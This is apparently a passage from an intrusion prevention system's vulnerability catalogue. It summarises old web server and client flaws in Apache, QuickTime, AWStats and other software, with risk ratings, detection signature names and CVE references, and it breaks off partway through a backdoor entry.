About this vulnerability:

ColdFusion creates temporary files in web root.

Risk:

Low

First detected in:

sgpkg-ips-16-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ColdFusion

Type:

Malfunction

Description:

Allaire ColdFusion creates temporary files in web root, which discloses potentially sensitive information.

Situation:

HTTP_CSU-Allaire-ColdFusion-cfcache.map-Disclosure

References:

CVE-2000-0057
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0057

BID-917
http://www.securityfocus.com/bid/917

HTTP-Altavista-Query-Cgi-File-Disclosure

About this vulnerability:

Altavista Search Intranet query arbitrary file disclosure

Risk:

Low

First detected in:

sgpkg-ips-2-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Altavista Search Intranet

Type:

Directory Traversal

Description:

Altavista Intranet Search has a directory traversal vulnerability that allows remote users to read arbitrary files from the server.

Situation:

HTTP_CSU-Altavista-Query-Cgi-File-Disclosure

References:

CVE-2000-0039
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0039

BID-896
http://www.securityfocus.com/bid/896

OSVDB-15
http://www.osvdb.org/15

HTTP-Amaya-Sendtemp-Pl-File-Disclosure

About this vulnerability:

File disclosure vulnerability in Amaya's sendtemp.pl

Risk:

Low

First detected in:

sgpkg-ips-2-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Amaya Web development server

Type:

Directory Traversal

Description:

The Sendtemp.pl file distributed with the Amaya Web development server from W3.org has a directory-traversal vulnerability. This allows remote attackers to view files from the server that the server process has access to.

Situation:

HTTP_CSU-Amaya-Sendtemp-Pl-File-Disclosure

References:

CVE-2001-0272
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0272

HTTP-America-Online-ICQ-ActiveX-Control-DownloadAgent-Function-Code-Execution

About this vulnerability:

Code execution vulnerability in AOL ICQ

Risk:

Moderate

First detected in:

sgpkg-ips-85-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

AOL Instant Messenger

Type:

Malfunction

Description:

AOL Instant Messenger has a code execution vulnerability. A successful exploitation allows code execution with the privileges of the currently logged in user.

Situation:

HTTP_SS-America-Online-ICQ-ActiveX-Control-DownloadAgent-Function-Called
File-Text_America-Online-ICQ-ActiveX-Control-DownloadAgent-Function-Called

References:

CVE-2006-5650
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5650

BID-20930
http://www.securityfocus.com/bid/20930

OSVDB-30220
http://www.osvdb.org/30220

HTTP-An-Httpd-Cgi-System-Compromise

About this vulnerability:

AN-HTTPd test CGI system compromise

Risk:

High

First detected in:

sgpkg-ips-2-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

AN-HTTPd

Type:

Malfunction

Description:

The test CGI scripts distributed with AN-HTTPd 1.20b allow remote attackers to execute commands via shell metacharacters.

References:

CVE-1999-0947
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0947

BID-762
http://www.securityfocus.com/bid/762

HTTP-Anaconda-Directory-Traversal

About this vulnerability:

Anaconda Foundation Directory NULL byte vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1638-5242

Platform:

Unix

Software:

Anaconda Foundation Directory

Type:

Directory Traversal

Description:

Directory traversal vulnerability in apexec.pl in Anaconda Foundation can be exploited to reveal any file on the system.

References:

CVE-2000-0975
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0975

OSVDB-435
http://www.osvdb.org/435

HTTP-Anakonda-Clipper-Directory-Traversal

About this vulnerability:

Anaconda Clipper Directory Taversal

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1636-5242

Platform:

Unix

Software:

Anaconda Clipper

Type:

Directory Traversal

Description:

The Anaconda Clipper is vulnerable to a directory traversal attack allowing the disclosure of any file on the system.

References:

CVE-2001-0593
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0593

BID-2512
http://www.securityfocus.com/bid/2512

HTTP-Anhttpd-Isapi-Count-Pl-DoS

About this vulnerability:	Anhttpd Isamp Count Pl DoS
Risk:	Low
First detected in:	sgpkg-ips-1-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	AN-HTTPd
Type:	Directory Traversal
Description:	A directory traversal bug in AN HTTP server allows an attacker to overwrite contents of a file using count.pl cgi script, which is included with the webserver.
Situation:	HTTP_CSU-Anhttpd-Isapi-Count-Pl-DoS

HTTP-Ans-Pl-Directory-Traversal

About this vulnerability:

Ans Pl Directory Traversal

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1636-5242

Platform:

Generic

Software:

Avenger's News System

Type:

Directory Traversal

Description:

Avenger's News System contains a directory traversal vulnerability which allows the attacker to view arbitary files on the victim system.

References:

CVE-2002-0307
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0307

BID-4147
http://www.securityfocus.com/bid/4147

HTTP-AOLserver-Dotdotdot-Directory-Traversal

About this vulnerability:

AOLserver "..." directory traversal vulnerability

Risk:

Low

First detected in:

sgpkg-ips-48-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

AOLserver

Type:

Directory Traversal

Description:

A directory travesal vulnerability in AOLServer 3.2 allows remote attacker to read arbitrary files

Situation:

HTTP_CSU-Dotdotdot-Directory-Traversal

References:

CVE-2001-0205
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0205

BID-2343
http://www.securityfocus.com/bid/2343

HTTP-Apache-Auth_LDAP-Format-String-Vulnerability

About this vulnerability:

Format string vulnerability in Apache LDAP

Risk:

Moderate

First detected in:

sgpkg-ips-113-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache mod_auth_ldap

Type:

Format String

Description:

Apache auth_ldap module 1.6.0 suffers from a format string vulnerability where usernames containing format string characters allows remote attackers to execute arbitrary code on the vulnerable server.

Situation:

HTTP_CSH-Basic-Authentication-Username-Contains-Format-String-Characters

References:

CVE-2006-0150
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0150

BID-16177
http://www.securityfocus.com/bid/16177

HTTP-Apache-Backslash-Directory-Traversal

About this vulnerability:

Apache Backslash Directory Traversal

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1640-5242

Platform:

Windows

Software:

Apache

Type:

Directory Traversal

Description:

Apache contains a directory traversal vulnerability which may be exploited to gain remote system compromise (when escaping the cgi-bin directory) or file disclosure.

Situation:

HTTP_CSU-Apache-Backslash-Directory-Traversal

References:

CVE-2002-0661
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0661

BID-5434
http://www.securityfocus.com/bid/5434

HTTP-Apache-Chunked-Encoding-BOF

About this vulnerability:

Apache Chunked Encoding Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Buffer Overflow

Description:

Apache webservers incorrectly handle chunked encoding requests which can be exploited to execute arbitaty code on the system. By sending a crafted chunk-encoded HTTP request, a remote attacker can cause a denial of service or execute arbitrary code with the privileges of the vulnerable service process.

Situation:

HTTP_CSH-Transfer-Encoding-Chunked
HTTP_CCH-Apache-Chunked-Encoding-BO-3
HTTP_CS-Apache-Chunked-Encoding-BO-4
HTTP_CCH-Apache-Chunked-Encoding-BO-5
HTTP_CCH-Apache-And-Nginx-Multiple-Chunked-Encoding-Vulnerabilities

References:

CVE-2002-0392
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0392

BID-5033
http://www.securityfocus.com/bid/5033

OSVDB-838
http://www.osvdb.org/838

HTTP-Apache-Crlf-Resource-Starvation-DoS

About this vulnerability:

Apache Crlf Resource Starvation Denial of Service

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Resource Starvation

Description:

Apache server can be tricked into allocating lots of memory by sending excessive amounts of line feed characters. This will result in a denial of service condition.

Situation:

HTTP_CS-Apache-Crlf-DoS

References:

CVE-2003-0132
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0132

BID-7254
http://www.securityfocus.com/bid/7254

HTTP-Apache-Host-Header-Default-Error-Page-XSS

About this vulnerability:

Apache web server XSS vulnerability in default error page

Risk:

Low

First detected in:

sgpkg-ips-105-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Cross-site Scripting

Description:

Apache versions 1.3.0-1.3.26 and 2.0-2.0.43 have a cross-site scripting vulnerability in the default error page. A link containing a crafted host field can be used to execute script code in the context of the webserver, and can be used to take arbitrary actions as the victim who follows the link.

Situation:

HTTP_CSH-Apache-Host-Header-Default-Error-Page-XSS
HTTP_CSH-Script-In-Host-Header

References:

CVE-2002-0840
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0840

BID-5847
http://www.securityfocus.com/bid/5847

OSVDB-862
http://www.osvdb.org/862

HTTP-Apache-Memory-Consumption-Denial-Of-Service

About this vulnerability:

Certain versions of Apache web server allocates extensive amount of memory when processing certain invalid header fields in HTTP request

Risk:

Low

First detected in:

sgpkg-ips-88-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Resource Starvation

Description:

Certain versions of Apache web server allocate too much memory when processing certain invalid header fields in HTTP request.

Situation:

HTTP_CSH-Invalid-HTTP-Request-Header-Field

References:

CVE-2004-0942
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0942

HTTP-Apache-Mod-Proxy-DoS

About this vulnerability:

Denial of service vulnerability in Apache mod_proxy

Risk:

Moderate

First detected in:

sgpkg-ips-5-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache mod_proxy

Type:

Resource Starvation

Description:

The Apache mod_proxy has a buffer overflow vulnerability. By sending a negative Content-length in HTTP header, the server can be made to copy large amounts of memory.

Situation:

HTTP_CSH-Negative-Content-Length-Value

References:

CVE-2004-0492
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0492

HTTP-Apache-Mod-Rewrite-Module-LDAP-Scheme-Handling-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Apache HTTP Server

Risk:

Moderate

First detected in:

sgpkg-ips-74-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Apache HTTP Server. The vulnerability can be exploited by sending a malformed HTTP request with a specially crafted URL string that contains an LDAP schema and five or more CGI variables. This causes a DoS condition or execution of arbitrary code with the privileges of Apache HTTP Server.

Situation:

HTTP_CSU-Apache-Mod-Rewrite-Module-LDAP-Scheme-Handling-Buffer-Overflow

References:

CVE-2006-3747
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3747

BID-19204
http://www.securityfocus.com/bid/19204

OSVDB-27588
http://www.osvdb.org/27588

HTTP-Apache-Mod-SSL-Custom-Error-Page-Non-SSL-DoS

About this vulnerability:

Apache mod_ssl denial of service vulnerability when sending non-SSL requests to an SSL port

Risk:

Moderate

First detected in:

sgpkg-ips-105-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Malfunction

Description:

Mod_ssl in Apache 2.0 - 2.0.55 suffers from a denial of service vulnerability when non-SSL requests are sent to an SSL port. If a vulnerable host is configured with an SSL vhost with access control and a custom 400 error page, remote attackers can exploit the vulnerability to crash Apache.

Situation:

HTTPS_CS-Plaintext-Request-In-HTTPS-Context

References:

CVE-2005-3357
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3357

BID-16152
http://www.securityfocus.com/bid/16152

HTTP-Apache-Portable-Runtime-Apr-Psprintf-Long-String-Vulnerability

About this vulnerability:

APR apr_sprintf long string vulnerability

Risk:

Low

First detected in:

sgpkg-ips-105-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Malfunction

Description:

The function apr_psprintf in Apache versions 2.0.37 - 2.0.45 does not handle long strings properly. This allows remote attackers to cause a denial of service by crashing the server.

Situation:

HTTP_CS-Apache-Portable-Runtime-Apr-Psprintf-Long-String-Vulnerability-Suspected
HTTP_CSH-Oversized-Host-Header-Field
HTTP_CS-Apache-Portable-Runtime-Apr-Psprintf-Long-String-Vulnerability

References:

CVE-2003-0245
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0245

BID-7723
http://www.securityfocus.com/bid/7723

HTTP-Apache-Potential-Probe

About this vulnerability:	Potential vulnerability probe of Apache httpd
Risk:	Low
First detected in:	sgpkg-ips-793-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Apache
Type:	Insecure Configuration
Description:	Suspicious vulnerability probe of an Apache httpd web server.
Situation:	HTTP_CSU-Apache-Potential-Probe HTTP_CSU-Apache-Server-Status-Probe

HTTP-Apache-Struts-Arbitrary-Remote-Java-Execution

About this vulnerability:

Apache Struts Remote Java Execetuion Vulnerability

Risk:

High

First detected in:

sgpkg-ips-338-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Struts

Type:

Code Injection

Description:

A command execution vulnerability exists in the web application framework Apache Struts2. The vulnerability is due to insufficient input validation in the ParametersInterceptor component when parsing incoming HTTP requests. A remote attacker can leverage this vulnerability by sending a crafted HTTP request to a target system. In attack scenarios where code execution is successful, the behaviour of the affected server depends entirely on the logic of the attacker-controlled code. This malicious code would be executed within the privileges of the affected service. Unsuccessful attack attempts may cause the targeted web application to stop responding or enter into an error state, resulting in a denial of service condition.

Situation:

HTTP_CRL-Apache-Struts-Remote-Java-Execution-3
HTTP_CRL-Apache-Struts-Remote-Java-Execution-2
HTTP_CRL-Apache-Struts-Remote-Java-Execution

References:

CVE-2010-1870
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1870

BID-41592
http://www.securityfocus.com/bid/41592

OSVDB-66280
http://www.osvdb.org/66280

HTTP-Apache-Struts-Directory-Traversal-File-Disclosure

About this vulnerability:

Apache Struts directory traversal file disclosure

Risk:

Moderate

First detected in:

sgpkg-ips-182-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Struts

Type:

Directory Traversal

Description:

There exists a directory traversal vulnerability in the Apache Struts. The vulnerability is due to an input validation error in Struts that does not properly sanitize the URI for directory traversal patterns. Successful exploitation allows unauthenticated remote attackers to disclose or access arbitrary files on the vulnerable server.

Situation:

HTTP_CSU-Apache-Struts-Encoded-Dot-Dot-Slash-Directory-Traversal

References:

CVE-2008-6505
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6505

BID-32104
http://www.securityfocus.com/bid/32104

OSVDB-49734
http://www.osvdb.org/49734

OSVDB-49733
http://www.osvdb.org/49733

HTTP-Apache-Tomcat-Snp-Information-Disclosure

About this vulnerability:

Apache Tomcat snp Information Disclosure

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache Tomcat

Type:

Malfunction

Description:

Tomcat for Apache reveals information like paths and OS about the system when a non-existent snp file is requested.

Situation:

HTTP_CS-Apache-Tomcat-Snp-Access

References:

CVE-2000-0760
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0760

BID-1532
http://www.securityfocus.com/bid/1532

HTTP-Apache-WebDAV-Propfind-Dir-Disclosure

About this vulnerability:

Apache WebDAV propfind directory disclosure

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apache

Type:

Insecure Configuration

Description:

The insecure default configuration of Apache WebDAV on SUSE Linux 6.4 provides directory listings to the attacker. Directory listings can be used to find more vulnerabilities and thus to launch new, more severe attacks.

Situation:

HTTP_CS-Apache-WebDAV-Propfind-Access

References:

CVE-2000-0869
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0869

BID-1656
http://www.securityfocus.com/bid/1656

HTTP-Apache-Win32-Pipe-Metacharacter-Attack

About this vulnerability:

Apache Win32 Pipe Metacharacter Attack

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Apache

Type:

Metacharacter

Description:

Apache for Windows can be tricked into executing arbitary commands with SYSTEM privileges through the batch file execution functionality by using the pipe character.

Situation:

HTTP_CRL-Apache-Win32-Pipe-Metacharacter-Attack

References:

CVE-2002-0061
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0061

BID-4335
http://www.securityfocus.com/bid/4335

HTTP-Apache2-Consume-Memory-DoS

About this vulnerability:

Memory exhaustion vulnerability in Apache

Risk:

Moderate

First detected in:

sgpkg-ips-8-1102

Last changed:

sgpkg-ips-1528-5242

Platform:

Linux; OS X; HP-UX

Software:

Apache

Type:

Resource Starvation

Description:

A specially crafted HTTP request may cause the Apache process to consume all the available memory and crash.

Situation:

HTTP_CS-Apache2-Out-Of-Memory-DoS

References:

CVE-2004-0493
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0493

BID-10619
http://www.securityfocus.com/bid/10619

HTTP-Apple-Ichat-Aim-Url-Handler-Format-String-Vulnerability

About this vulnerability:

A format string vulnerability in Apple iChat client

Risk:

Moderate

First detected in:

sgpkg-ips-93-1314

Last changed:

sgpkg-ips-1425-5242

Platform:

Mac OS X

Software:

Apple iChat AV

Type:

Format String

Description:

There is a format string vulnerability in Apple iChat instant messaging client. A malicious, crafted web page may be used to execute code in the context of the current user, leading to system compromise or denial of service.

Situation:

HTTP_Apple-Ichat-Aim-Url-Handler-Format-String-Vulnerability

References:

CVE-2007-0021
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0021

BID-22146
http://www.securityfocus.com/bid/22146

OSVDB-32715
http://www.osvdb.org/32715

HTTP-Apple-iPhoto-Xml-Title-Format-String-Vulnerability

About this vulnerability:

A format string vulnerability in Apple iPhoto

Risk:

Moderate

First detected in:

sgpkg-ips-91-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Mac OS X

Software:

Apple iPhoto

Type:

Format String

Description:

There is a format string vulnerability in Apple iPhoto. A crafted photocast can be used to execute code with the privileges of the current user.

Situation:

HTTP_Apple-iPhoto-Xml-Title-Format-String-Vulnerability
File-Text_Apple-iPhoto-Xml-Title-Format-String-Vulnerability
File-TextId_Apple-iPhoto-Xml-Title-Format-String-Vulnerability

References:

CVE-2007-0051
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0051

BID-21871
http://www.securityfocus.com/bid/21871

OSVDB-31165
http://www.osvdb.org/31165

HTTP-Apple-QuickTime-FPX-File-Handling-Integer-Overflow

About this vulnerability:

Heap based buffer overflow vulnerability in Apple Quicktime

Risk:

Moderate

First detected in:

sgpkg-ips-66-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Buffer Overflow

Description:

Apple Quicktime has a heap based buffer overflow vulnerability. The vulnerability can be exploited by persuading a user to open a specially crafted FPX file with a vulnerable product, causing a DoS or allowing non-privileged code execution.

Situation:

HTTP_Apple-QuickTime-FPX-File-Handling-Integer-Overflow
E-Mail_BS-Apple-QuickTime-FPX-File-Handling-Integer-Overflow
File-OLE_Apple-QuickTime-FPX-File-Handling-Integer-Overflow

References:

CVE-2006-1249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1249

BID-17074
http://www.securityfocus.com/bid/17074

HTTP-Apple-QuickTime-H.264-Crafted-Movie-Buffer-Overflow

About this vulnerability:

Stack-based buffer overflow vulnerability in Apple QuickTime

Risk:

Moderate

First detected in:

sgpkg-ips-82-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Buffer Overflow

Description:

Apple QuickTime has a stack-based buffer overflow vulnerability. A remote attacker can entice a target user to download and open a malicious H.264 file with the vulnerable QuickTime product to cause a DoS or execute arbitrary non-privileged code on the victim's computer.

Situation:

HTTP_Apple-QuickTime-H.264-Crafted-Movie-Buffer-Overflow
File-MPEG_Apple-QuickTime-H.264-Crafted-Movie-Buffer-Overflow

References:

CVE-2006-4381
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4381

BID-19976
http://www.securityfocus.com/bid/19976

OSVDB-28774
http://www.osvdb.org/28774

HTTP-Apple-QuickTime-Obji-Atom-Parsing-Stack-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Apple QuickTime

Risk:

High

First detected in:

sgpkg-ips-153-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Apple QuickTime. A remote attacker can exploit this vulnerability by persuading a user to open a malicious Quicktime movie file with a vulnerable version of the affected product. Successful exploitation allows code execution with the privileges of the currently logged in user.

Situation:

HTTP_SS-Apple-QuickTime-Obji-Atom-Parsing-Stack-Buffer-Overflow
File-MPEG_Apple-QuickTime-Obji-Atom-Parsing-Stack-Buffer-Overflow

References:

CVE-2008-1022
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1022

BID-28583
http://www.securityfocus.com/bid/28583

OSVDB-44003
http://www.osvdb.org/44003

HTTP-Apple-QuickTime-Plug-In-Security-Bypass

About this vulnerability:

Security bypass vulnerability in Apple QuickTime

Risk:

Moderate

First detected in:

sgpkg-ips-81-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Malfunction

Description:

There is a security bypass vulnerability in Apple QuickTime. The vulnerability can be exploited by persuading a target user to launch a malicious QuickTime Media Link file with the vulnerable product. This causes arbitrary non-privileged script code execution on the victim's computer.

Situation:

HTTP_Apple-QuickTime-Plug-In-Security-Bypass
File-TextId_Apple-QuickTime-Plug-In-Security-Bypass

References:

CVE-2006-4965
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4965

BID-20138
http://www.securityfocus.com/bid/20138

OSVDB-29064
http://www.osvdb.org/29064

HTTP-Apple-QuickTime-RTSP-URI-Buffer-Overflow

About this vulnerability:

A vulnerability in Apple QuickTime rtsp protocol handler allows code execution

Risk:

High

First detected in:

sgpkg-ips-90-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Apple QuickTime

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the RTSP protocol handler of the Apple QuickTime Player. A crafted URI can be used to execute code in the context of the current user.

Situation:

HTTP_SS-Apple-QuickTime-RTSP-URI-Buffer-Overflow
File-TextId_Apple-QuickTime-RTSP-URI-Buffer-Overflow

References:

CVE-2007-0015
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0015

BID-21829
http://www.securityfocus.com/bid/21829

OSVDB-31023
http://www.osvdb.org/31023

HTTP-Apple-Safari-Regular-Expression-Heap-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Apple Safari web browser

Risk:

High

First detected in:

sgpkg-ips-118-2032

Last changed:

sgpkg-ips-1555-5242

Platform:

Generic

Software:

Safari

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Apple Safari web browser. A remote attacker can exploit this vulnerability by enticing a user to visit a crafted web site, which allows the attacker to execute arbitrary code with the privileges of the currently logged in user.

Situation:

HTTP_Apple-Safari-Regular-Expression-Heap-Buffer-Overflow

References:

CVE-2007-3944
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3944

BID-25002
http://www.securityfocus.com/bid/25002

HTTP-Arbitroweb-Rawurl-Cross-Site

About this vulnerability:

Cross-site scripting vulnerability in Arbitroweb's rawurl parameter

Risk:

Moderate

First detected in:

sgpkg-ips-5-1102

Last changed:

sgpkg-ips-1602-5242

Platform:

Generic

Software:

Arbitroweb

Type:

Malfunction

Description:

Arbitroweb is vulnerable to cross-site scripting. The Index.php script's rawUrl parameter is not properly filtered, allowing arbitrary HTML or script code to be entered.

References:

CVE-2004-0617
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0617

BID-10592
http://www.securityfocus.com/bid/10592

HTTP-Artmedic-Links5-File-Disclosure

About this vulnerability:

Artmedic_links5 file disclosure vulnerability

Risk:

Low

First detected in:

sgpkg-ips-5-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

artmedic_links5

Type:

Malfunction

Description:

Artmedic_links5 allows remote attackers to view arbitrary files on the Web server by passing file names or URLs to 'index.php?id'.

References:

CVE-2004-0624
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0624

HTTP-Awstats-Config-Parameter-Command-Execution

About this vulnerability:

Command execution via AWStats config parameter

Risk:

High

First detected in:

sgpkg-ips-21-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

AWStats

Type:

Malfunction

Description:

Awstats 'config' parameter can be used to execute commands with shell metacharacters. This allows remote attackers to execute arbitrary commands on the server via HTTP requests.

Situation:

HTTP_CSU-Awstats-Config-Parameter-Command-Execution

References:

CVE-2005-0363
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0363

BID-12543
http://www.securityfocus.com/bid/12543

HTTP-Awstats-Configdir-Parameter-System-Compromise

About this vulnerability:

Awstats arbitrary command execution vulnerability

Risk:

High

First detected in:

sgpkg-ips-19-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

AWStats

Type:

Metacharacter Injection

Description:

AWStats is a tool that creates web statistics that does not validate input correctly. A remote attacker can execute arbitrary commands on the host by requesting awstats.pl and giving the configdir parameter a value that contains commands preceded and followed by pipe '|' metacharacters.

Situation:

HTTP_CSU-Awstats-Configdir-Parameter-System-Compromise
HTTP_CRL-Awstats-Configdir-Parameter-System-Compromise-2
HTTP_SS-Lupper-Worm-Download
File-Binary_Lupper-Worm-Download

References:

CVE-2005-0116
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0116

BID-12298
http://www.securityfocus.com/bid/12298

OSVDB-13002
http://www.osvdb.org/13002

HTTP-Awstats-Logfile-Parameter-Command-Execution

About this vulnerability:

Command execution via AWStats logfile parameter

Risk:

High

First detected in:

sgpkg-ips-21-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

AWStats

Type:

Malfunction

Description:

Awstats 'logfile' parameter can be used to execute commands with shell metacharacters. This allows remote attackers to execute arbitrary commands on the server via HTTP requests.

Situation:

HTTP_CSU-Awstats-Logfile-Parameter-Command-Execution
HTTP_CRL-Awstats-Logfile-Parameter-Command-Execution-2

References:

BID-12572
http://www.securityfocus.com/bid/12572

HTTP-Awstats-Plugin-Arbitrary-Command-Execution

About this vulnerability:

Command execution vulnerability in Awstats

Risk:

High

First detected in:

sgpkg-ips-21-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

AWStats

Type:

Malfunction

Description:

Awstats has a vulnerability in the handling of plugins that allows arbitrary command execution. Remote attackers can include commands in the 'pluginmode' parameter, allowing arbitrary commands to be executed via HTTP requests.

Situation:

HTTP_CSU-Awstats-Plugin-Arbitrary-Command-Execution

References:

CVE-2005-0362
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0362

BID-12543
http://www.securityfocus.com/bid/12543

OSVDB-16089
http://www.osvdb.org/16089

HTTP-Awstats-Rawplugin-Log-Disclosure

About this vulnerability:

Log disclosure vulnerability in Awstats

Risk:

High

First detected in:

sgpkg-ips-21-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

AWStats

Type:

Malfunction

Description:

Awstats discloses web server logs when 'loadplugin' and 'pluginmode' parameters are set to rawlog. This allows remote attackers to read sensitive information, such as IP addresses, GET queries, etc.

Situation:

HTTP_CSU-Awstats-Rawplugin-Log-Disclosure

References:

CVE-2005-0435
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0435

HTTP-Axis-Storpoint-Authentication-Bypass

About this vulnerability:

Axis Storpoint Authentication Bypass

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

AXIS StorPoint

Type:

Malfunction

Description:

The remote administration for Axis Storpoint contains a vulnerability which allows the bypassing of the authentication to gain elevated system privileges on the victim system.

Situation:

HTTP_CS-Axis-Storpoint-Authentication-Bypass

References:

CVE-2000-0191
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0191

BID-1025
http://www.securityfocus.com/bid/1025

OSVDB-19
http://www.osvdb.org/19

HTTP-Aztec-Forum-Admin-Password-Disclosure

About this vulnerability:

Aztec forum admin password disclosure

Risk:

Moderate

First detected in:

sgpkg-ips-22-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Aztec Forum

Type:

Malfunction

Description:

Aztec forum has a vulnerability, which allows remote attackers to obtain the admin password. The vulnerability can be triggered by a HTTP request to the forum, and results in remote attackers being able to administer the forum.

Situation:

HTTP_CS-Aztec-Forum-Admin-Password-Disclosure

References:

BID-12745
http://www.securityfocus.com/bid/12745

HTTP-Backdoor-WANRemote

About this vulnerability:	WANRemote backdoor activity
Risk:	High
First detected in:	sgpkg-ips-11-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	WANRemote
Type:	Backdoor
Description:	WANRemote is a trojan horse program that provides a backdoor to the infected system. The backdoor allows a remote attacker to control the backdoored system via a browser.
Situation:	HTTP_WANRemote-Backdoor-Response File-Text_WANRemote-Backdoor-Response

HTTP-Backdoor-Web-Server-CT

About this vulnerability:	Web Server CT backdoor activity
Risk:	High
First detected in:	sgpkg-ips-11-1102
Last changed:	sgpkg-ips-1296-5242
